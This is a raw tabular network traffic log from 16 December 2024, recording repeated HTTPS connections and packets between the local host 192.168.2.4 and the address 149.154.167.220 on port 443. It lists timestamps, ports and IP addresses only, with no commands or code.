Dec 16, 2024 14:17:25.029458046 CET	443	50105	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:26.393754959 CET	443	50105	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:26.393826008 CET	50105	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:26.397850037 CET	50105	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:26.397862911 CET	443	50105	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:26.398092985 CET	443	50105	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:26.399967909 CET	50105	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:26.400033951 CET	443	50105	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:26.400088072 CET	50105	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:26.405158997 CET	50106	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:26.405215979 CET	443	50106	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:26.405280113 CET	50106	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:26.405525923 CET	50106	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:26.405539036 CET	443	50106	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:27.776168108 CET	443	50106	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:27.776271105 CET	50106	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:27.777787924 CET	50106	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:27.777821064 CET	443	50106	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:27.778687954 CET	443	50106	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:27.780590057 CET	50106	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:27.780641079 CET	443	50106	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:27.780706882 CET	50106	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:27.783952951 CET	50107	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:27.784003019 CET	443	50107	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:27.784071922 CET	50107	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:27.784324884 CET	50107	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:27.784342051 CET	443	50107	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:29.147445917 CET	443	50107	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:29.147618055 CET	50107	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:29.149344921 CET	50107	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:29.149354935 CET	443	50107	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:29.149599075 CET	443	50107	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:29.154535055 CET	50107	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:29.154570103 CET	443	50107	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:29.154638052 CET	50107	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:29.157383919 CET	50108	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:29.157426119 CET	443	50108	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:29.157501936 CET	50108	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:29.157741070 CET	50108	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:29.157747030 CET	443	50108	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:30.526756048 CET	443	50108	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:30.526931047 CET	50108	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:30.528645039 CET	50108	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:30.528660059 CET	443	50108	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:30.529198885 CET	443	50108	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:30.534528971 CET	50108	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:30.534580946 CET	443	50108	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:30.534653902 CET	50108	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:30.538044930 CET	50109	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:30.538091898 CET	443	50109	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:30.538163900 CET	50109	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:30.538464069 CET	50109	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:30.538480997 CET	443	50109	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:31.900856018 CET	443	50109	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:31.900926113 CET	50109	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:31.903362036 CET	50109	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:31.903378963 CET	443	50109	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:31.903623104 CET	443	50109	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:31.905512094 CET	50109	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:31.905558109 CET	443	50109	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:31.905680895 CET	443	50109	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:31.905725956 CET	50109	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:31.905761957 CET	50109	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:31.908806086 CET	50110	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:31.908854961 CET	443	50110	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:31.908917904 CET	50110	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:31.909149885 CET	50110	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:31.909171104 CET	443	50110	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:33.281277895 CET	443	50110	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:33.281378984 CET	50110	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:33.283884048 CET	50110	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:33.283895016 CET	443	50110	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:33.284145117 CET	443	50110	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:33.286336899 CET	50110	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:33.286376953 CET	443	50110	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:33.286437035 CET	50110	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:33.290599108 CET	50111	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:33.290641069 CET	443	50111	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:33.290708065 CET	50111	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:33.290956974 CET	50111	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:33.290973902 CET	443	50111	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:34.661315918 CET	443	50111	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:34.661422968 CET	50111	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:34.663850069 CET	50111	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:34.663868904 CET	443	50111	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:34.664138079 CET	443	50111	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:34.666045904 CET	50111	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:34.666101933 CET	443	50111	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:34.666234970 CET	443	50111	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:34.666268110 CET	50111	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:34.666309118 CET	50111	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:34.669462919 CET	50112	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:34.669504881 CET	443	50112	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:34.669671059 CET	50112	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:34.670001030 CET	50112	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:34.670022011 CET	443	50112	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:36.066791058 CET	443	50112	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:36.066884041 CET	50112	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:36.068837881 CET	50112	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:36.068864107 CET	443	50112	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:36.069099903 CET	443	50112	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:36.070755005 CET	50112	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:36.070789099 CET	443	50112	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:36.070908070 CET	443	50112	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:36.070960999 CET	50112	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:36.070979118 CET	50112	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:36.073919058 CET	50113	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:36.073955059 CET	443	50113	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:36.074037075 CET	50113	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:36.074335098 CET	50113	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:36.074345112 CET	443	50113	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:37.447582006 CET	443	50113	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:37.447666883 CET	50113	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:37.449727058 CET	50113	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:37.449737072 CET	443	50113	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:37.449995995 CET	443	50113	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:37.452640057 CET	50113	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:37.452681065 CET	443	50113	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:37.452809095 CET	50113	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:37.457127094 CET	50114	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:37.457175970 CET	443	50114	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:37.457370043 CET	50114	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:37.457835913 CET	50114	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:37.457847118 CET	443	50114	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:38.828195095 CET	443	50114	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:38.828303099 CET	50114	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:38.829926014 CET	50114	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:38.829943895 CET	443	50114	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:38.830322981 CET	443	50114	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:38.832434893 CET	50114	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:38.832477093 CET	443	50114	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:38.832537889 CET	50114	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:38.844575882 CET	50115	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:38.844619989 CET	443	50115	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:38.844701052 CET	50115	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:38.845016003 CET	50115	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:38.845031023 CET	443	50115	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:40.208570957 CET	443	50115	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:40.208738089 CET	50115	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:40.210872889 CET	50115	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:40.210884094 CET	443	50115	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:40.211184025 CET	443	50115	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:40.221343994 CET	50115	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:40.221436024 CET	443	50115	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:40.221506119 CET	50115	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:40.224351883 CET	50116	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:40.224401951 CET	443	50116	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:40.224488020 CET	50116	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:40.225006104 CET	50116	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:40.225020885 CET	443	50116	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:41.598109007 CET	443	50116	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:41.598200083 CET	50116	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:41.600133896 CET	50116	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:41.600157976 CET	443	50116	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:41.600519896 CET	443	50116	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:41.604582071 CET	50116	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:41.604650974 CET	443	50116	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:41.604738951 CET	50116	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:41.607345104 CET	50117	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:41.607407093 CET	443	50117	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:41.607496023 CET	50117	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:41.607711077 CET	50117	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:41.607728958 CET	443	50117	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:42.986900091 CET	443	50117	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:42.987127066 CET	50117	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:43.007467031 CET	50117	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:43.007543087 CET	443	50117	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:43.008142948 CET	443	50117	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:43.010360003 CET	50117	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:43.010445118 CET	443	50117	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:43.010525942 CET	50117	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:43.017627001 CET	50118	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:43.017698050 CET	443	50118	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:43.017772913 CET	50118	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:43.018009901 CET	50118	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:43.018032074 CET	443	50118	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:44.386876106 CET	443	50118	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:44.386979103 CET	50118	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:44.389218092 CET	50118	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:44.389230013 CET	443	50118	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:44.389488935 CET	443	50118	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:44.391596079 CET	50118	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:44.391638041 CET	443	50118	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:44.391767025 CET	443	50118	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:44.391782045 CET	50118	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:44.391839981 CET	50118	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:44.395901918 CET	50119	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:44.395999908 CET	443	50119	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:44.396106005 CET	50119	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:44.396450043 CET	50119	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:44.396485090 CET	443	50119	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:45.769753933 CET	443	50119	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:45.769876003 CET	50119	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:45.784245968 CET	50119	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:45.784293890 CET	443	50119	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:45.784651995 CET	443	50119	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:45.788170099 CET	50119	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:45.788229942 CET	443	50119	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:45.788290977 CET	50119	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:45.827527046 CET	50120	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:45.827585936 CET	443	50120	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:45.827676058 CET	50120	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:45.832453966 CET	50120	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:45.832474947 CET	443	50120	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:47.194098949 CET	443	50120	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:47.194165945 CET	50120	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:47.196213961 CET	50120	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:47.196228981 CET	443	50120	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:47.196489096 CET	443	50120	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:47.396503925 CET	50120	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:49.073595047 CET	50120	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:49.073698044 CET	443	50120	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:49.073810101 CET	50120	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:49.076523066 CET	50122	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:49.076555014 CET	443	50122	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:49.076667070 CET	50122	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:49.077095985 CET	50122	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:49.077106953 CET	443	50122	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:50.440139055 CET	443	50122	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:50.440222979 CET	50122	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:50.444866896 CET	50122	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:50.444879055 CET	443	50122	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:50.445183992 CET	443	50122	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:50.489154100 CET	50122	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:52.194067001 CET	50122	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:52.194173098 CET	443	50122	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:52.194329023 CET	50122	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:52.197108030 CET	50124	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:52.197146893 CET	443	50124	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:52.197228909 CET	50124	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:52.197501898 CET	50124	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:52.197515965 CET	443	50124	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:53.563323975 CET	443	50124	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:53.563400984 CET	50124	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:53.565505028 CET	50124	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:53.565516949 CET	443	50124	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:53.565751076 CET	443	50124	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:53.674685955 CET	50124	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:55.301378965 CET	50124	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:55.301491022 CET	443	50124	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:55.301558018 CET	50124	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:55.304373026 CET	50126	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:55.304397106 CET	443	50126	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:55.304512024 CET	50126	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:55.304773092 CET	50126	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:55.304783106 CET	443	50126	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:56.670922041 CET	443	50126	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:56.671036005 CET	50126	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:56.673376083 CET	50126	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:56.673389912 CET	443	50126	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:56.673635960 CET	443	50126	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:56.879381895 CET	443	50126	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:56.880786896 CET	50126	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:58.443870068 CET	50126	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:58.443981886 CET	443	50126	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:58.444047928 CET	50126	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:58.446753025 CET	50128	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:58.446799994 CET	443	50128	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:58.446885109 CET	50128	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:58.447336912 CET	50128	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:58.447345972 CET	443	50128	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:59.819252014 CET	443	50128	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:59.819329977 CET	50128	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:59.820940018 CET	50128	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:17:59.820951939 CET	443	50128	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:59.821295023 CET	443	50128	149.154.167.220	192.168.2.4
Dec 16, 2024 14:17:59.896559000 CET	50128	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:01.620635986 CET	50128	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:01.620845079 CET	443	50128	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:01.620929003 CET	50128	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:01.623524904 CET	50130	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:01.623578072 CET	443	50130	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:01.623657942 CET	50130	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:01.623931885 CET	50130	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:01.623946905 CET	443	50130	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:02.998064041 CET	443	50130	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:02.998471975 CET	50130	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:03.005927086 CET	50130	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:03.005949020 CET	443	50130	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:03.006191015 CET	443	50130	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:03.209048033 CET	50130	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:05.049650908 CET	50130	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:05.049765110 CET	443	50130	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:05.049834967 CET	50130	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:05.053416014 CET	50132	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:05.053477049 CET	443	50132	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:05.053543091 CET	50132	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:05.053828955 CET	50132	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:05.053843975 CET	443	50132	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:06.421225071 CET	443	50132	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:06.421314955 CET	50132	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:06.428823948 CET	50132	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:06.428863049 CET	443	50132	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:06.429125071 CET	443	50132	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:06.505899906 CET	50132	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:08.177442074 CET	50132	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:08.177592039 CET	443	50132	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:08.177670002 CET	50132	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:08.180480003 CET	50134	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:08.180540085 CET	443	50134	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:08.180613995 CET	50134	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:08.180963993 CET	50134	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:08.180990934 CET	443	50134	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:09.541649103 CET	443	50134	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:09.541718006 CET	50134	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:09.544414997 CET	50134	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:09.544430971 CET	443	50134	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:09.544672012 CET	443	50134	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:09.693411112 CET	50134	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:12.220194101 CET	50134	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:12.220307112 CET	443	50134	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:12.220374107 CET	50134	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:12.223721027 CET	50136	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:12.223798990 CET	443	50136	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:12.223885059 CET	50136	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:12.224189997 CET	50136	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:12.224221945 CET	443	50136	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:13.599095106 CET	443	50136	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:13.599236965 CET	50136	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:14.530597925 CET	50136	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:14.530662060 CET	443	50136	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:14.531029940 CET	443	50136	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:14.539136887 CET	50136	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:14.579339027 CET	443	50136	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:14.579407930 CET	50136	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:14.579425097 CET	443	50136	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:15.114219904 CET	443	50136	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:15.114315987 CET	443	50136	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:15.114365101 CET	50136	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:15.114870071 CET	50136	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:15.116461992 CET	50137	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:15.116574049 CET	443	50137	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:15.116651058 CET	50137	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:15.116980076 CET	50137	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:15.117016077 CET	443	50137	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:16.497036934 CET	443	50137	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:16.498904943 CET	50137	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:16.498920918 CET	443	50137	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:16.498994112 CET	50137	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:18:16.498997927 CET	443	50137	149.154.167.220	192.168.2.4
